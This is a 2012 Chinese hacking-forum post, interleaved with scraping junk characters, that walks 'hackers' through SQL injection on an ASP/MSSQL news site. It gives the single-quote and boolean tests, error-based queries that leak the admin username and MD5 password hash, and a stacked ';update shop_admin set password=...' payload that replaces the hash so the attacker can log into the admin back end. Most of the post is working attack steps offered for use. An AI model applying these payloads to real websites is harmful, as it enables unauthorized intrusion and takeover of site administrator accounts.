经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
! ~0 H, ~" ]( e* g9 X+ q可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL): q. q% P" _' v, X1 d
测试如下:. F0 e |3 ~& V) E* r( C) J
http://www.tmdsb.com/news.asp?id=1217 g- M% P+ ?2 u
在地址后输入单引号,显示; B e. o$ [" ?1 J7 d
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’% R6 O, | J7 `0 b* @. q! G5 t
字符串 ’’’ 之前有未闭合的引号
, i8 U4 V$ v4 Q+ ?0 S/news/tmdws.asp,行63% S$ k7 r- e8 Y: w6 D$ b
说明没有过滤单引号且数据库是MSSQL.; ]+ V3 g# j& @$ f- s) [3 u
and 1=1正常。and 1=2出错。肯定存在注入
/ W5 H8 X# S2 h: Z6 b" E5 W$ T接着输入, |! P( v) g% C G6 g O: O
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
, }; Q) a1 N9 j, z/ _7 S得到帐号为:admin
: s, A7 H% o3 {9 qhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
, X5 C0 e( d8 e2 q( H得到密码为:a4716077c2ba075c
! ~" I( F" S: k# f9 m, T9 y' k接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433( ?& `# e$ p$ N7 W
命令如下 :
7 K E$ I1 v5 T3 e;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
$ c0 N A) \; A4 T4 f; N+ L6 @这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41